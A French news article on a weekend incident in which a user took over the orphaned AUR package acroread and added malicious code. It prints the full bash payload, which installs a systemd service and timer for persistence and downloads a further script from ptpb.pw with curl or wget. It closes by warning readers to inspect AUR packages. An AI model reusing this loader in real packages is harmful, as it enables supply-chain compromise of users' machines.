Pour bien comprendre pourquoi un incident de ce type peut se produire, il faut souligner que dans l’écosystème Arch Linux, chaque utilisateur a la possibilité de prendre le contrôle d’un paquetage sans mainteneur actif. C’est ce qui s’est produit ce weekend lorsque l’utilisateur « xreactor » est passé à l’action sur le package acroread qui, comme son nom laisse filtrer, sert de visionneuse de fichiers pdf. Au sein du commit, un script curl monté de sorte à provoquer le téléchargement d’ un certain fichier « ~x » à partir du site ptpb.pw. La manœuvre permet d’installer (sur le poste de la victime) un logiciel qui reconfigure systemd pour provoquer l’exécution d’un autre script au sein du fichier « ~x » de façon périodique. Le détail dans le code source du fichier « ~x » :
Code : | Sélectionner tout |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 | #!/bin/bash # get to the right location if [[ -n "$pkgdir" ]]; then cd "$pkgdir" else exit 0 fi be_silent() { "$@" >/dev/null 2>&1 } # systemd files SYSTEMD_TIMER="[Timer] OnCalendar=4d Persistent=true OnActiveSec=360 [Install] WantedBy=timers.target" SYSTEMD_SERVICE="[Unit] Type=simple ExecStart=/usr/lib/xeactor/u.sh" # write systemd files mkdir -p usr/lib/systemd/system mkdir -p etc/systemd/system/multi-user.target.wants echo "$SYSTEMD_SERVICE" > usr/lib/systemd/system/xeactor.service echo "$SYSTEMD_TIMER" > usr/lib/systemd/system/xeactor.timer ln -s /usr/lib/systemd/system/xeactor.timer etc/systemd/system/multi-user.target.wants/xeactor.timer # get the upload script mkdir -p usr/lib/xeactor if be_silent which curl; then curl -s https://ptpb.pw/~u > usr/lib/xeactor/u.sh elif be_silent which wget; then wget -qOusr/lib/xeactor/u.sh https://ptpb.pw/~u else exit 0 fi |
Attention, ne pas confondre le dépôt AUR avec le dépôt officiel Arch Build System (ABS). Les utilisateurs de tous bords sont les auteurs des paquetages disponibles au sein du premier tandis que le second tire ses contenus de sources fiables. D’ailleurs, l’équipe Arch Linux déconseille de procéder à l’installation d’un paquetage issu de l’AUR sans l’avoir passé au peigne fin.
Ce type d’incident n’est pas l’apanage de la distribution Arch Linux. En mai, des utilisateurs ont découvert un mineur de monnaie cryptographique logé au sein de l’Ubuntu Snap Store.
Sources : commit, signalement, sensortech
Et vous ?
De quelles précautions vous entourez-vous lorsque vous téléchargez des contenus de dépôts similaires ?
Voir aussi :
Arch Linux annonce la fin du support de l'architecture 32 bits, un fork voit le jour pour continuer à offrir l'OS sur les PC 32 bits
DistroWatch compare les rangs occupés par les distributions Linux, en 10 ans les ténors sont là, Quelle est votre distribution préférée en 2016 ?
Quelles sont vos distributions Linux préférées ? Et pour quelles utilisations ? Merci de partager votre expérience avec les distributions Linux
Linux : bientôt la fin du support de matériel 32 bits ? Ubuntu Desktop et Server pourraient ne plus proposer d'images 32 bits dès octobre 2016